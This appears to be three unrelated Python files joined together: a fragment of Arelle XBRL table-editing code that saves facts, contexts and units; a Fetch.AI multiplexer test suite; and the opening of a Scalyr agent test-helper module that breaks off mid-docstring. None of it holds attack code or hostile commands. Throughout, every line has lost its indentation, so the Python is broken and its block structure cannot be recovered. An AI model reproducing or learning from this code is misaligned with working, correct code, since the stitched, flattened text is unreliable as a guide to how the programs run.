if modelXbrl.modelDocument.type == ModelDocument.Type.INSTANCE:
tbl = self.table
# get coordinates of last currently operated cell
coordinates = tbl.getCurrentCellCoordinates()
if coordinates is not None:
# get object identifier from its coordinates in the current table
objId = tbl.getObjectId(coordinates)
if objId is not None and len(objId) > 0:
if objId and objId[0] == "f":
# fact prototype
viewableObject = self.factPrototypes[int(objId[1:])]
elif objId[0] != "a":
# instance fact
viewableObject = self.modelXbrl.modelObject(objId)
else:
return
modelXbrl.viewModelObject(viewableObject)
def updateInstanceFromFactPrototypes(self):
# Only update the model if it already exists
if self.modelXbrl is not None \
and self.modelXbrl.modelDocument.type == ModelDocument.Type.INSTANCE:
instance = self.modelXbrl
cntlr = instance.modelManager.cntlr
newCntx = ModelXbrl.AUTO_LOCATE_ELEMENT
newUnit = ModelXbrl.AUTO_LOCATE_ELEMENT
tbl = self.table
# check user keyed changes to aspects
aspectEntryChanges = {} # index = widget ID, value = widget contents
aspectEntryChangeIds = _DICT_SET(aspectEntryChanges.keys())
for modifiedCell in tbl.getCoordinatesOfModifiedCells():
objId = tbl.getObjectId(modifiedCell)
if objId is not None and len(objId)>0:
if tbl.isHeaderCell(modifiedCell):
if objId[0] == OPEN_ASPECT_ENTRY_SURROGATE:
aspectEntryChanges[objId] = tbl.getTableValue(modifiedCell)
else:
# check user keyed changes to facts
cellIndex = str(modifiedCell)
comboboxCells = tbl.window_names(cellIndex)
if comboboxCells is not None and len(comboboxCells)>0:
comboName = tbl.window_cget(cellIndex, '-window')
combobox = cntlr.parent.nametowidget(comboName)
else:
combobox = None
if isinstance(combobox, _Combobox):
codeDict = combobox.codes
if len(codeDict)>0: # the drop-down list shows labels, we want to have the actual values
bodyCellValue = tbl.getTableValue(modifiedCell)
value = codeDict.get(bodyCellValue, None)
if value is None:
value = bodyCellValue # this must be a qname!
else:
value = tbl.getTableValue(modifiedCell)
else:
value = tbl.getTableValue(modifiedCell)
objId = tbl.getObjectId(modifiedCell)
if objId is not None and len(objId)>0:
if objId[0] == "f":
factPrototypeIndex = int(objId[1:])
factPrototype = self.factPrototypes[factPrototypeIndex]
concept = factPrototype.concept
if concept is None:
if not self.conceptMessageIssued:
# This should be removed once cells have been disabled until every needed selection is done
self.conceptMessageIssued = True
self.modelXbrl.modelManager.cntlr.showMessage(_("Please make sure every Z axis selection is done"))
return
else:
self.conceptMessageIssued = False
entityIdentScheme = self.newFactItemOptions.entityIdentScheme
entityIdentValue = self.newFactItemOptions.entityIdentValue
periodType = concept.periodType
periodStart = self.newFactItemOptions.startDateDate if periodType == "duration" else None
periodEndInstant = self.newFactItemOptions.endDateDate
qnameDims = factPrototype.context.qnameDims
newAspectValues = self.newFactOpenAspects(objId)
if newAspectValues is None:
self.modelXbrl.modelManager.showStatus(_("Some open values are missing in an axis, the save is incomplete"), 5000)
continue
qnameDims.update(newAspectValues)
# open aspects widgets
prevCntx = instance.matchContext(
entityIdentScheme, entityIdentValue, periodType, periodStart, periodEndInstant,
qnameDims, [], [])
if prevCntx is not None:
cntxId = prevCntx.id
else: # need new context
newCntx = instance.createContext(entityIdentScheme, entityIdentValue,
periodType, periodStart, periodEndInstant,
concept.qname, qnameDims, [], [],
afterSibling=newCntx)
cntxId = newCntx.id # need new context
# new context
if concept.isNumeric:
if concept.isMonetary:
unitMeasure = qname(XbrlConst.iso4217, self.newFactItemOptions.monetaryUnit)
unitMeasure.prefix = "iso4217" # want to save with a recommended prefix
decimals = self.newFactItemOptions.monetaryDecimals
elif concept.isShares:
unitMeasure = XbrlConst.qnXbrliShares
decimals = self.newFactItemOptions.nonMonetaryDecimals
else:
unitMeasure = XbrlConst.qnXbrliPure
decimals = self.newFactItemOptions.nonMonetaryDecimals
prevUnit = instance.matchUnit([unitMeasure], [])
if prevUnit is not None:
unitId = prevUnit.id
else:
newUnit = instance.createUnit([unitMeasure], [], afterSibling=newUnit)
unitId = newUnit.id
attrs = [("contextRef", cntxId)]
if concept.isNumeric:
attrs.append(("unitRef", unitId))
attrs.append(("decimals", decimals))
value = Locale.atof(self.modelXbrl.locale, value, str.strip)
newFact = instance.createFact(concept.qname, attributes=attrs, text=value)
tbl.setObjectId(modifiedCell,
newFact.objectId()) # switch cell to now use fact ID
if self.factPrototypes[factPrototypeIndex] is not None:
self.factPrototypes[factPrototypeIndex].clear()
self.factPrototypes[factPrototypeIndex] = None #dereference fact prototype
elif objId[0] != "a": # instance fact, not prototype
fact = self.modelXbrl.modelObject(objId)
if fact.concept.isNumeric:
value = Locale.atof(self.modelXbrl.locale, value, str.strip)
if fact.concept.isMonetary:
unitMeasure = qname(XbrlConst.iso4217, self.newFactItemOptions.monetaryUnit)
unitMeasure.prefix = "iso4217" # want to save with a recommended prefix
decimals = self.newFactItemOptions.monetaryDecimals
elif fact.concept.isShares:
unitMeasure = XbrlConst.qnXbrliShares
decimals = self.newFactItemOptions.nonMonetaryDecimals
else:
unitMeasure = XbrlConst.qnXbrliPure
decimals = self.newFactItemOptions.nonMonetaryDecimals
if fact.value != str(value):
if fact.isNil != (not value):
fact.isNil = not value
if fact.isNil:
pass
#TODO: clear out nil facts
if fact.concept.isNumeric and (not fact.isNil): # if nil, there is no need to update these values
fact.decimals = decimals
prevUnit = instance.matchUnit([unitMeasure], [])
if prevUnit is not None:
unitId = prevUnit.id
else:
newUnit = instance.createUnit([unitMeasure], [], afterSibling=newUnit)
unitId = newUnit.id
fact.unitID = unitId
fact.text = str(value)
instance.setIsModified()
fact.xValid = UNVALIDATED
xmlValidate(instance, fact)
tbl.clearModificationStatus()
def saveInstance(self, newFilename=None, onSaved=None):
if (not self.newFactItemOptions.entityIdentScheme or # not initialized yet
not self.newFactItemOptions.entityIdentValue or
not self.newFactItemOptions.startDateDate or not self.newFactItemOptions.endDateDate):
if not getNewFactItemOptions(self.modelXbrl.modelManager.cntlr, self.newFactItemOptions):
return # new instance not set
# newFilename = None # only used when a new instance must be created
self.updateInstanceFromFactPrototypes()
if self.modelXbrl.modelDocument.type != ModelDocument.Type.INSTANCE and newFilename is None:
newFilename = self.modelXbrl.modelManager.cntlr.fileSave(view=self, fileType="xbrl")
if not newFilename:
return # saving cancelled
# continue saving in background
thread = threading.Thread(target=lambda: self.backgroundSaveInstance(newFilename, onSaved))
thread.daemon = True
thread.start()
def backgroundSaveInstance(self, newFilename=None, onSaved=None):
cntlr = self.modelXbrl.modelManager.cntlr
if newFilename and self.modelXbrl.modelDocument.type != ModelDocument.Type.INSTANCE:
self.modelXbrl.modelManager.showStatus(_("creating new instance {0}").format(os.path.basename(newFilename)))
self.modelXbrl.modelManager.cntlr.waitForUiThreadQueue() # force status update
self.modelXbrl.createInstance(newFilename) # creates an instance as this modelXbrl's entrypoint
instance = self.modelXbrl
cntlr.showStatus(_("Saving {0}").format(instance.modelDocument.basename))
cntlr.waitForUiThreadQueue() # force status update
self.updateInstanceFromFactPrototypes()
instance.saveInstance(newFilename) # may override prior filename for instance from main menu
cntlr.addToLog(_("{0} saved").format(newFilename if newFilename is not None else instance.modelDocument.filepath))
cntlr.showStatus(_("Saved {0}").format(instance.modelDocument.basename), clearAfter=3000)
if onSaved is not None:
self.modelXbrl.modelManager.cntlr.uiThreadQueue.put((onSaved, []))
def newFactOpenAspects(self, factObjectId):
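# Collect the aspect (dimension) values that the user keyed into the open-aspect entry
# cells belonging to this fact prototype; returns a dict of {aspect: value}, or None when
# an open aspect cell is still empty so the caller can skip saving the incomplete fact.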
aspectValues = {}
for aspectObjId in self.factPrototypeAspectEntryObjectIds[factObjectId]:
structuralNode = self.aspectEntryObjectIdsNode[aspectObjId]
for aspect in structuralNode.aspectsCovered():
if aspect != Aspect.DIMENSIONS:
break
gridCellItem = self.aspectEntryObjectIdsCell[aspectObjId]
value = gridCellItem.get()
# is aspect in a childStructuralNode?
if value is not None and OPEN_ASPECT_ENTRY_SURROGATE in aspectObjId and len(value)==0:
return None # some values are missing!
if value:
aspectValue = structuralNode.aspectEntryHeaderValues.get(value)
if aspectValue is None: # try converting value
if isinstance(aspect, QName): # dimension
dimConcept = self.modelXbrl.qnameConcepts[aspect]
if dimConcept.isExplicitDimension:
# value must be qname
aspectValue = None # need to find member for the description
else:
typedDimElement = dimConcept.typedDomainElement
aspectValue = FunctionXfi.create_element(
self.rendrCntx, None, (typedDimElement.qname, (), value))
if aspectValue is not None:
aspectValues[aspect] = aspectValue
return aspectValues
def aspectEntryValues(self, structuralNode):
for aspect in structuralNode.aspectsCovered():
if aspect != Aspect.DIMENSIONS:
break
# if findHeader is None, return all header values in a list
# otherwise return aspect value matching header if any
depth = 0
n = structuralNode
while (n.parentStructuralNode is not None):
depth += 1
root = n = n.parentStructuralNode
headers = set()
headerValues = {}
def getHeaders(n, d):
for childStructuralNode in n.childStructuralNodes:
if d == depth:
h = childStructuralNode.header(lang=self.lang,
returnGenLabel=False,
returnMsgFormatString=False)
if not childStructuralNode.isEntryPrototype() and h:
headerValues[h] = childStructuralNode.aspectValue(aspect)
headers.add(h)
else:
getHeaders(childStructuralNode, d+1)
getHeaders(root, 1)
structuralNode.aspectEntryHeaderValues = headerValues
# is this an explicit dimension, if so add "(all members)" option at end
headersList = sorted(headers)
if isinstance(aspect, QName): # dimension
dimConcept = self.modelXbrl.qnameConcepts[aspect]
if dimConcept.isExplicitDimension:
if headersList: # has entries, add "(all members)" at end
headersList.append("(all members)")
else: # empty list, just add all members anyway
return self.explicitDimensionFilterMembers(structuralNode, structuralNode)
return headersList
def onAspectComboboxSelection(self, event):
gridCombobox = event.widget
if gridCombobox.get() == "(all members)":
structuralNode = self.aspectEntryObjectIdsNode[gridCombobox.objectId]
self.comboboxLoadExplicitDimension(gridCombobox, structuralNode, structuralNode)
def comboboxLoadExplicitDimension(self, gridCombobox, structuralNode, structuralNodeWithFilter):
gridCombobox["values"] = self.explicitDimensionFilterMembers(structuralNode, structuralNodeWithFilter)
def explicitDimensionFilterMembers(self, structuralNode, structuralNodeWithFilter):
for aspect in structuralNodeWithFilter.aspectsCovered():
if isinstance(aspect, QName): # dimension
break
valueHeaders = set()
if structuralNode is not None:
headerValues = {}
# check for dimension filter(s)
dimFilterRels = structuralNodeWithFilter.definitionNode.filterRelationships
if dimFilterRels:
for rel in dimFilterRels:
dimFilter = rel.toModelObject
if dimFilter is not None:
for memberModel in dimFilter.memberProgs:
memQname = memberModel.qname
memConcept = self.modelXbrl.qnameConcepts.get(memQname)
if memConcept is not None and (not memberModel.axis or memberModel.axis.endswith('-self')):
header = memConcept.label(lang=self.lang)
valueHeaders.add(header)
if rel.isUsable:
headerValues[header] = memQname
else:
headerValues[header] = memConcept
if memberModel.axis and memberModel.linkrole and memberModel.arcrole:
# merge of pull request 42 acsone:TABLE_Z_AXIS_DESCENDANT_OR_SELF
if memberModel.axis.endswith('-or-self'):
searchAxis = memberModel.axis[:len(memberModel.axis)-len('-or-self')]
else:
searchAxis = memberModel.axis
relationships = concept_relationships(self.rendrCntx,
None,
(memQname,
memberModel.linkrole,
memberModel.arcrole,
searchAxis),
False) # return flat list
for rel in relationships:
if rel.isUsable:
header = rel.toModelObject.label(lang=self.lang)
valueHeaders.add(header)
headerValues[header] = rel.toModelObject.qname
if not valueHeaders:
relationships = concept_relationships(self.rendrCntx,
None,
(aspect,
"XBRL-all-linkroles", # linkrole,
"XBRL-dimensions",
'descendant'),
False) # return flat list
for rel in relationships:
if (rel.arcrole in (XbrlConst.dimensionDomain, XbrlConst.domainMember)
and rel.isUsable):
header = rel.toModelObject.label(lang=self.lang)
valueHeaders.add(header)
headerValues[header] = rel.toModelObject.qname
structuralNode.aspectEntryHeaderValues = headerValues
return sorted(valueHeaders)
# import after other modules resolved to prevent circular references
from arelle.FunctionXfi import concept_relationships
|
test_multiplexer.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests for the Multiplexer."""
import asyncio
import logging
import shutil
import tempfile
import time
import unittest.mock
from pathlib import Path
from threading import Thread
from unittest import mock
from unittest.mock import patch
import pytest
import aea
from aea.configurations.base import PublicId
from aea.identity.base import Identity
from aea.mail.base import AEAConnectionError, Envelope, EnvelopeContext
from aea.multiplexer import AsyncMultiplexer, InBox, Multiplexer, OutBox
from aea.protocols.default.message import DefaultMessage
from packages.fetchai.connections.local.connection import LocalNode
from .conftest import (
UNKNOWN_CONNECTION_PUBLIC_ID,
UNKNOWN_PROTOCOL_PUBLIC_ID,
_make_dummy_connection,
_make_local_connection,
_make_stub_connection,
logger,
)
@pytest.mark.asyncio
async def test_receiving_loop_terminated():
"""Test that connecting twice the multiplexer behaves correctly."""
multiplexer = Multiplexer([_make_dummy_connection()])
multiplexer.connect()
with unittest.mock.patch.object(aea.mail.base.logger, "debug") as mock_logger_debug:
multiplexer.connection_status.is_connected = False
await multiplexer._receiving_loop()
mock_logger_debug.assert_called_with("Receiving loop terminated.")
multiplexer.connection_status.is_connected = True
multiplexer.disconnect()
def test_connect_twice():
"""Test that connecting twice the multiplexer behaves correctly."""
multiplexer = Multiplexer([_make_dummy_connection()])
assert not multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.disconnect()
def test_disconnect_twice():
"""Test that connecting twice the multiplexer behaves correctly."""
multiplexer = Multiplexer([_make_dummy_connection()])
assert not multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.disconnect()
multiplexer.disconnect()
def test_connect_twice_with_loop():
"""Test that connecting twice the multiplexer behaves correctly."""
running_loop = asyncio.new_event_loop()
thread_loop = Thread(target=running_loop.run_forever)
thread_loop.start()
try:
multiplexer = Multiplexer([_make_dummy_connection()], loop=running_loop)
with unittest.mock.patch.object(
aea.mail.base.logger, "debug"
) as mock_logger_debug:
assert not multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
mock_logger_debug.assert_called_with("Multiplexer already connected.")
multiplexer.disconnect()
running_loop.call_soon_threadsafe(running_loop.stop)
finally:
thread_loop.join()
@pytest.mark.asyncio
async def test_connect_twice_a_single_connection():
"""Test that connecting twice a single connection behaves correctly."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
assert not multiplexer.connection_status.is_connected
await multiplexer._connect_one(connection.connection_id)
with unittest.mock.patch.object(aea.mail.base.logger, "debug") as mock_logger_debug:
await multiplexer._connect_one(connection.connection_id)
mock_logger_debug.assert_called_with(
"Connection fetchai/dummy:0.1.0 already established."
)
await multiplexer._disconnect_one(connection.connection_id)
def test_multiplexer_connect_all_raises_error():
"""Test the case when the multiplexer raises an exception while connecting."""
multiplexer = Multiplexer([_make_dummy_connection()])
with unittest.mock.patch.object(multiplexer, "_connect_all", side_effect=Exception):
with pytest.raises(
AEAConnectionError, match="Failed to connect the multiplexer."
):
multiplexer.connect()
multiplexer.disconnect()
def test_multiplexer_connect_one_raises_error_many_connections():
"""Test the case when the multiplexer raises an exception while attempting the connection of one connection."""
node = LocalNode()
tmpdir = Path(tempfile.mkdtemp())
d = tmpdir / "test_stub"
d.mkdir(parents=True)
input_file_path = d / "input_file.csv"
output_file_path = d / "input_file.csv"
connection_1 = _make_local_connection("my_addr", node)
connection_2 = _make_stub_connection(input_file_path, output_file_path)
connection_3 = _make_dummy_connection()
multiplexer = Multiplexer([connection_1, connection_2, connection_3])
assert not connection_1.is_connected
assert not connection_2.is_connected
assert not connection_3.is_connected
with unittest.mock.patch.object(connection_3, "connect", side_effect=Exception):
with pytest.raises(
AEAConnectionError, match="Failed to connect the multiplexer."
):
multiplexer.connect()
assert not connection_1.is_connected
assert not connection_2.is_connected
assert not connection_3.is_connected
multiplexer.disconnect()
try:
shutil.rmtree(tmpdir)
except OSError as e:
logger.warning("Couldn't delete {}".format(tmpdir))
logger.exception(e)
@pytest.mark.asyncio
async def test_disconnect_twice_a_single_connection():
"""Test that connecting twice a single connection behaves correctly."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([_make_dummy_connection()])
assert not multiplexer.connection_status.is_connected
with unittest.mock.patch.object(aea.mail.base.logger, "debug") as mock_logger_debug:
await multiplexer._disconnect_one(connection.connection_id)
mock_logger_debug.assert_called_with(
"Connection fetchai/dummy:0.1.0 already disconnected."
)
def test_multiplexer_disconnect_all_raises_error():
"""Test the case when the multiplexer raises an exception while disconnecting."""
multiplexer = Multiplexer([_make_dummy_connection()])
multiplexer.connect()
assert multiplexer.connection_status.is_connected
with unittest.mock.patch.object(
multiplexer, "_disconnect_all", side_effect=Exception
):
with pytest.raises(
AEAConnectionError, match="Failed to disconnect the multiplexer."
):
multiplexer.disconnect()
# do the real disconnection - to clean up the test
assert multiplexer.connection_status.is_connected
multiplexer.disconnect()
assert not multiplexer.connection_status.is_connected
@pytest.mark.asyncio
async def test_multiplexer_disconnect_one_raises_error_many_connections():
"""Test the case when the multiplexer raises an exception while attempting the disconnection of one connection."""
with LocalNode() as node:
tmpdir = Path(tempfile.mkdtemp())
d = tmpdir / "test_stub"
d.mkdir(parents=True)
input_file_path = d / "input_file.csv"
output_file_path = d / "input_file.csv"
connection_1 = _make_local_connection("my_addr", node)
connection_2 = _make_stub_connection(input_file_path, output_file_path)
connection_3 = _make_dummy_connection()
multiplexer = Multiplexer([connection_1, connection_2, connection_3])
assert not connection_1.is_connected
assert not connection_2.is_connected
assert not connection_3.is_connected
multiplexer.connect()
assert connection_1.is_connected
assert connection_2.is_connected
assert connection_3.is_connected
with unittest.mock.patch.object(
connection_3, "disconnect", side_effect=Exception
):
with pytest.raises(
AEAConnectionError, match="Failed to disconnect the multiplexer."
):
multiplexer.disconnect()
assert not connection_1.is_connected
assert not connection_2.is_connected
assert connection_3.is_connected
# clean the test up.
await connection_3.disconnect()
multiplexer.disconnect()
try:
shutil.rmtree(tmpdir)
except OSError as e:
logger.warning("Couldn't delete {}".format(tmpdir))
logger.exception(e)
@pytest.mark.asyncio
async def test_sending_loop_does_not_start_if_multiplexer_not_connected():
"""Test that the sending loop is stopped does not start if the multiplexer is not connected."""
multiplexer = Multiplexer([_make_dummy_connection()])
with unittest.mock.patch.object(aea.mail.base.logger, "debug") as mock_logger_debug:
await multiplexer._send_loop()
mock_logger_debug.assert_called_with(
"Sending loop not started. The multiplexer is not connected."
)
@pytest.mark.asyncio
async def test_sending_loop_cancelled():
"""Test the case when the sending loop is cancelled."""
multiplexer = Multiplexer([_make_dummy_connection()])
multiplexer.connect()
await asyncio.sleep(0.1)
with unittest.mock.patch.object(aea.mail.base.logger, "debug") as mock_logger_debug:
multiplexer.disconnect()
mock_logger_debug.assert_any_call("Sending loop cancelled.")
@pytest.mark.asyncio
async def test_receiving_loop_raises_exception():
"""Test the case when an error occurs when a receive is started."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
with unittest.mock.patch("asyncio.wait", side_effect=Exception("a weird error.")):
with unittest.mock.patch.object(
aea.mail.base.logger, "error"
) as mock_logger_error:
multiplexer.connect()
time.sleep(0.1)
mock_logger_error.assert_called_with(
"Error in the receiving loop: a weird error.", exc_info=True
)
multiplexer.disconnect()
@pytest.mark.asyncio
async def test_send_envelope_with_non_registered_connection():
"""Test that sending an envelope with an unregistered connection raises an exception."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
multiplexer.connect()
envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(connection_id=UNKNOWN_CONNECTION_PUBLIC_ID),
)
with pytest.raises(AEAConnectionError, match="No connection registered with id:.*"):
await multiplexer._send(envelope)
multiplexer.disconnect()
def test_send_envelope_error_is_logged_by_send_loop():
"""Test that the AEAConnectionError in the '_send' method is logged by the '_send_loop'."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
multiplexer.connect()
fake_connection_id = UNKNOWN_CONNECTION_PUBLIC_ID
envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(connection_id=fake_connection_id),
)
with unittest.mock.patch.object(aea.mail.base.logger, "error") as mock_logger_error:
multiplexer.put(envelope)
time.sleep(0.1)
mock_logger_error.assert_called_with(
"No connection registered with id: {}.".format(fake_connection_id)
)
multiplexer.disconnect()
def test_get_from_multiplexer_when_empty():
"""Test that getting an envelope from the multiplexer when the input queue is empty raises an exception."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
with pytest.raises(aea.mail.base.Empty):
multiplexer.get()
# TODO: fix test; doesn't make sense to use same multiplexer for different agents
# def test_multiple_connection():
# """Test that we can send a message with two different connections."""
# with LocalNode() as node:
# identity_1 = Identity("", address="address_1")
# identity_2 = Identity("", address="address_2")
# connection_1 = _make_local_connection(identity_1.address, node)
# connection_2 = _make_dummy_connection()
# multiplexer = Multiplexer([connection_1, connection_2])
# assert not connection_1.is_connected
# assert not connection_2.is_connected
# multiplexer.connect()
# assert connection_1.is_connected
# assert connection_2.is_connected
# message = DefaultMessage(
# dialogue_reference=("", ""),
# message_id=1,
# target=0,
# performative=DefaultMessage.Performative.BYTES,
# content=b"hello",
# )
# envelope_from_1_to_2 = Envelope(
# to=identity_2.address,
# sender=identity_1.address,
# protocol_id=DefaultMessage.protocol_id,
# message=DefaultSerializer().encode(message),
# context=EnvelopeContext(connection_id=connection_1.connection_id),
# )
# multiplexer.put(envelope_from_1_to_2)
# actual_envelope = multiplexer.get(block=True, timeout=2.0)
# assert envelope_from_1_to_2 == actual_envelope
# envelope_from_2_to_1 = Envelope(
# to=identity_1.address,
# sender=identity_2.address,
# protocol_id=DefaultMessage.protocol_id,
# message=DefaultSerializer().encode(message),
# context=EnvelopeContext(connection_id=connection_2.connection_id),
# )
# multiplexer.put(envelope_from_2_to_1)
# actual_envelope = multiplexer.get(block=True, timeout=2.0)
# assert envelope_from_2_to_1 == actual_envelope
# multiplexer.disconnect()
def test_send_message_no_supported_protocol():
"""Test the case when we send an envelope with a specific connection that does not support the protocol."""
with LocalNode() as node:
identity_1 = Identity("", address="address_1")
public_id = PublicId.from_str("fetchai/my_private_protocol:0.1.0")
connection_1 = _make_local_connection(
identity_1.address,
node,
restricted_to_protocols={public_id},
excluded_protocols={public_id},
)
multiplexer = Multiplexer([connection_1])
multiplexer.connect()
with mock.patch.object(aea.mail.base.logger, "warning") as mock_logger_warning:
protocol_id = UNKNOWN_PROTOCOL_PUBLIC_ID
envelope = Envelope(
to=identity_1.address,
sender=identity_1.address,
protocol_id=protocol_id,
message=b"some bytes",
)
multiplexer.put(envelope)
time.sleep(0.5)
mock_logger_warning.assert_called_with(
"Connection {} cannot handle protocol {}. Cannot send the envelope.".format(
connection_1.connection_id, protocol_id
)
)
multiplexer.disconnect()
def test_autoset_default_connection():
"""Set default connection automatically."""
connection_1 = _make_dummy_connection()
connection_2 = _make_dummy_connection()
connections = [connection_1, connection_2]
multiplexer = Multiplexer(connections)
multiplexer._default_connection = None
multiplexer._set_default_connection_if_none()
assert multiplexer._default_connection == connections[0]
@pytest.mark.asyncio
async def test_disconnect_when_not_connected():
"""Test disconnect when not connected."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections)
with patch.object(multiplexer, "_disconnect_all") as disconnect_all_mocked:
await multiplexer.disconnect()
disconnect_all_mocked.assert_not_called()
@pytest.mark.asyncio
async def test_exit_on_none_envelope():
"""Test sending task exit on None envelope."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
try:
await multiplexer.connect()
assert multiplexer.is_connected
multiplexer.put(None)
await asyncio.sleep(0.5)
assert multiplexer._send_loop_task.done()
finally:
await multiplexer.disconnect()
@pytest.mark.asyncio
async def test_inbox_outbox():
"""Test InBox OutBox objects."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",)
msg.counterparty = "to"
msg.sender = "sender"
context = EnvelopeContext(connection_id=connection_1.connection_id)
envelope = Envelope(
to="to",
sender="sender",
protocol_id=msg.protocol_id,
message=msg,
context=context,
)
try:
await multiplexer.connect()
inbox = InBox(multiplexer)
outbox = OutBox(multiplexer, "default_address")
assert inbox.empty()
assert outbox.empty()
outbox.put(envelope)
received = await inbox.async_get()
assert received == envelope
assert inbox.empty()
assert outbox.empty()
outbox.put_message(msg, context=context)
await inbox.async_wait()
received = inbox.get_nowait()
assert received == envelope
finally:
await multiplexer.disconnect()
@pytest.mark.asyncio
async def test_outbox_negative():
"""Test InBox OutBox objects."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",)
context = EnvelopeContext(connection_id=connection_1.connection_id)
envelope = Envelope(
to="to",
sender="sender",
protocol_id=msg.protocol_id,
message=b"",
context=context,
)
try:
await multiplexer.connect()
outbox = OutBox(multiplexer, "default_address")
assert outbox.empty()
with pytest.raises(ValueError) as execinfo:
outbox.put(envelope)
assert (
str(execinfo.value)
== "Only Message type allowed in envelope message field when putting into outbox."
)
assert outbox.empty()
with pytest.raises(ValueError) as execinfo:
outbox.put_message("")
assert str(execinfo.value) == "Provided message not of type Message."
assert outbox.empty()
with pytest.raises(ValueError) as execinfo:
outbox.put_message(msg)
assert (
str(execinfo.value) == "Provided message has message.counterparty not set."
)
assert outbox.empty()
msg.counterparty = "to"
with pytest.raises(ValueError) as execinfo:
outbox.put_message(msg)
assert str(execinfo.value) == "Provided message has message.sender not set."
finally:
await multiplexer.disconnect()
@pytest.mark.asyncio
async def test_default_route_applied(caplog):
"""Test default route is selected automatically."""
logger = logging.getLogger("aea.multiplexer")
with caplog.at_level(logging.DEBUG, logger="aea.multiplexer"):
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
multiplexer.logger = logger
envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(),
)
multiplexer.default_routing = {
DefaultMessage.protocol_id: connection_1.connection_id
}
try:
await multiplexer.connect()
inbox = InBox(multiplexer)
outbox = InBox(multiplexer)
assert inbox.empty()
assert outbox.empty()
multiplexer.put(envelope)
await outbox.async_get()
finally:
await multiplexer.disconnect()
assert "Using default routing:" in caplog.text
def test_multiplexer_setup():
"""Test multiplexer setup to set connections."""
node = LocalNode()
tmpdir = Path(tempfile.mkdtemp())
d = tmpdir / "test_stub"
d.mkdir(parents=True)
input_file_path = d / "input_file.csv"
output_file_path = d / "input_file.csv"
connection_1 = _make_local_connection("my_addr", node)
connection_2 = _make_stub_connection(input_file_path, output_file_path)
connection_3 = _make_dummy_connection()
connections = [connection_1, connection_2, connection_3]
multiplexer = Multiplexer([])
with pytest.raises(AssertionError):
multiplexer._connection_consistency_checks()
multiplexer.setup(connections, default_routing=None)
multiplexer._connection_consistency_checks()
|
test_base.py
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
#
# author: Steven Czerwinski <czerwin@scalyr.com>
from __future__ import unicode_literals
from __future__ import absolute_import
from __future__ import print_function
if False: # NOSONAR
from typing import Optional
from io import open
__author__ = "czerwin@scalyr.com"
import os
import sys
import re
import shutil
import threading
import time
import tempfile
import unittest
import random
from pprint import pprint
import scalyr_agent.scalyr_logging as scalyr_logging
import six
from scalyr_agent.util import StoppableThread
from scalyr_agent import util as scalyr_util
PYTHON_26_OR_OLDER = sys.version_info[:2] < (2, 7)
# Need so we can patch print() function for test purposes under both, Python 2 and 3
print = print
LOG = scalyr_logging.getLogger(__name__)
def _noop_skip(reason):
def decorator(test_func_or_obj):
if not isinstance(test_func_or_obj, type) or sys.version_info < (2, 7, 0):
def test_skip_wrapper(*args, **kwargs):
print(
'Skipping test %s. Reason: "%s"'
% (test_func_or_obj.__name__, reason)
)
return test_skip_wrapper
else:
test_func_or_obj.__unittest_skip__ = True
test_func_or_obj.__unittest_skip_why__ = reason
return test_func_or_obj
return decorator
def _id(obj):
return obj
def _noop_skip_if(condition, reason):
if condition:
return _noop_skip(reason)
return _id
def _noop_skip_unless(condition, reason):
if not condition:
return _noop_skip(reason)
return _id
skip = _noop_skip
if hasattr(unittest, "skip"):
skip = unittest.skip
skipUnless = _noop_skip_unless
if hasattr(unittest, "skipUnless"):
skipUnless = unittest.skipUnless
skipIf = _noop_skip_if
if hasattr(unittest, "skipIf"):
skipIf = unittest.skipIf
# Global state as to whether or not we've started the thread watcher. We only want one instance of this
# started per entire test suite run.
__thread_watcher_started = False
def _thread_watcher():
"""Used to detect what threads are still alive after the tests should be finished running. In particular, this
helps detect cases where the tests have run successfully but some thread spawned by a test case did not
properly stop. Since it is not a daemon thread, it will block the exit of the entire process.
